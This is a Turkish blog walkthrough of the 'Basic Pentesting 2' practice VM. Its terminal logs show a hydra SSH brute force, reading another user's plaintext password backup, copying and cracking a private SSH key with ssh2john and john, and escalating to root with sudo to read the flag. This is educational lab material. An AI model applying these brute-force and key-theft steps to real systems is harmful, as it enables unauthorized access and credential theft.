Basic Pentesting 2 Walkthrough

Netdiscover komutu ile hedef makinenin aldığı ip adresini tespit amacıyla network taraması yapıyoruız.

Netdiscover -r 192.168.1.0/24

hydra -L users.txt -P parola.txt 192.168.1.21 -t 4 ssh

ssh [email protected]

[email protected]:~$ ls -l

total 0

[email protected]:~$ pwd

/home/jan

[email protected]:~$ cd ..

[email protected]:/home$ ls -l

total 8

drwxr-xr-x 2 root root 4096 Oct 31 09:19 jan

drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay

[email protected]:/home$ cd kay/.

./ ../ .cache/ .nano/ .ssh/

[email protected]:/home$ cd kay/

[email protected]:/home/kay$ ls -l

total 4

-rw——- 1 kay kay 57 Apr 23 2018 pass.bak

[email protected]:/home/kay$ vim pass.bak

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

[email protected]:/home/kay$ ssh [email protected]

Could not create directory ‘/home/jan/.ssh’.

The authenticity of host ‘192.168.1.21 (192.168.1.21)’ can’t be established.

ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.

Are you sure you want to continue connecting (yes/no)? yes

Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).

[email protected]’s password:

Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

256 packages can be updated.

166 updates are security updates.

New release ‘18.04.3 LTS’ available.

Run ‘do-release-upgrade’ to upgrade to it.

Last login: Thu Oct 31 09:20:37 2019 from 192.168.1.21

[email protected]:~$ sudo su

[sudo] password for kay:

[email protected]:/home/kay# whoami

[email protected]:/home/kay# cat /root/flag.txt

Congratulations! You’ve completed this challenge. There are two ways (that I’m aware of) to gain

a shell, and two ways to privesc. I encourage you to find them all!

If you’re in the target audience (newcomers to pentesting), I hope you learned something. A few

takeaways from this challenge should be that every little bit of information you can find can be

valuable, but sometimes you’ll need to find several different pieces of information and combine

them to make them useful. Enumeration is key! Also, sometimes it’s not as easy as just finding

an obviously outdated, vulnerable service right away with a port scan (unlike the first entry

in this series). Usually you’ll have to dig deeper to find things that aren’t as obvious, and

therefore might’ve been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you’ll send

me a link! I can be reached at [email protected] If you’ve got questions or feedback, please reach

out to me.

Happy hacking!

[email protected]:/home/kay#

Farklı Bir Yöntem

[email protected]:~$ cd /home/kay/

[email protected]:/home/kay$ cd .ssh/

[email protected]:/home/kay/.ssh$ ls -l

total 12

-rw-rw-r– 1 kay kay 771 Apr 23 2018 authorized_keys

-rw-r–r– 1 kay kay 3326 Apr 19 2018 id_rsa

-rw-r–r– 1 kay kay 771 Apr 19 2018 id_rsa.pub

[email protected]:~# scp [email protected]:/home/kay/.ssh/id_rsa .

[email protected]’s password:

id_rsa 100% 3326 3.4MB/s 00:00

[email protected]:~# chmod 600 id_rsa

[email protected]:~# ssh [email protected] -i id_rsa

Enter passphrase for key ‘id_rsa’:

[email protected]’s password:

[email protected]:~# ssh2john id_rsa > parola_crck.txt

bash: ssh2john: command not found

[email protected]:~# locate ssh2john

/usr/share/john/ssh2john.py

[email protected]:~# /usr/share/john/ssh2john.py id_rsa > parola_crck.txt

[email protected]:~# john –format=SSH –wordlist=rockyou.txt id_rsa parola_crck.txt

Using default input encoding: UTF-8

Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])

Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes

Cost 2 (iteration count) is 1 for all loaded hashes

Will run 2 OpenMP threads

Note: This format may emit false positives, so it will keep trying even after

finding a possible candidate.

Press ‘q’ or Ctrl-C to abort, almost any other key for status

beeswax (id_rsa)

Warning: Only 1 candidate left, minimum 2 needed for performance.

1g 0:00:00:15 DONE (2019-10-31 13:52) 0.06357g/s 911741p/s 911741c/s 911741C/s *7¡Vamos!

Session completed

[email protected]:~# ssh [email protected] -i id_rsa

Enter passphrase for key ‘id_rsa’:

Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

256 packages can be updated.

166 updates are security updates.

New release ‘18.04.3 LTS’ available.

Run ‘do-release-upgrade’ to upgrade to it.

Last login: Thu Oct 31 09:26:15 2019 from 192.168.1.21

[email protected]:~$

[email protected]:~$ sudo -l

[sudo] password for kay:

Sorry, try again.

[sudo] password for kay:

sudo: 1 incorrect password attempt

[email protected]:~$ ls -la

total 48

drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .

drwxr-xr-x 4 root root 4096 Oct 31 09:32 ..

-rw——- 1 kay kay 790 Oct 31 09:29 .bash_history

-rw-r–r– 1 kay kay 220 Apr 17 2018 .bash_logout

-rw-r–r– 1 kay kay 3771 Apr 17 2018 .bashrc

drwx—— 2 kay kay 4096 Apr 17 2018 .cache

-rw——- 1 root kay 119 Apr 23 2018 .lesshst

drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano

-rw——- 1 kay kay 57 Apr 23 2018 pass.bak

-rw-r–r– 1 kay kay 655 Apr 17 2018 .profile

drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh

-rw-r–r– 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful

-rw——- 1 root kay 538 Apr 23 2018 .viminfo

[email protected]:~$ cat pass.bak

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

[email protected]:~$ sudo -l

[sudo] password for kay:

Matching Defaults entries for kay on basic2:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:

(ALL : ALL) ALL

[email protected]:~$ sudo su

[email protected]:/home/kay# ls -la

total 48

drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .

drwxr-xr-x 4 root root 4096 Oct 31 09:32 ..

-rw——- 1 kay kay 790 Oct 31 09:29 .bash_history

-rw-r–r– 1 kay kay 220 Apr 17 2018 .bash_logout

-rw-r–r– 1 kay kay 3771 Apr 17 2018 .bashrc

drwx—— 2 kay kay 4096 Apr 17 2018 .cache

-rw——- 1 root kay 119 Apr 23 2018 .lesshst

drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano

-rw——- 1 kay kay 57 Apr 23 2018 pass.bak

-rw-r–r– 1 kay kay 655 Apr 17 2018 .profile

drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh

-rw-r–r– 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful

-rw——- 1 root kay 538 Apr 23 2018 .viminfo

[email protected]:/home/kay#

[email protected]:/home/kay# cat /root/flag.txt

Congratulations! You’ve completed this challenge. There are two ways (that I’m aware of) to gain

a shell, and two ways to privesc. I encourage you to find them all!

If you’re in the target audience (newcomers to pentesting), I hope you learned something. A few

takeaways from this challenge should be that every little bit of information you can find can be

valuable, but sometimes you’ll need to find several different pieces of information and combine

them to make them useful. Enumeration is key! Also, sometimes it’s not as easy as just finding

an obviously outdated, vulnerable service right away with a port scan (unlike the first entry

in this series). Usually you’ll have to dig deeper to find things that aren’t as obvious, and

therefore might’ve been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you’ll send

me a link! I can be reached at [email protected] If you’ve got questions or feedback, please reach

out to me.

Happy hacking!

[email protected]:/home/kay#

You may also like...

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir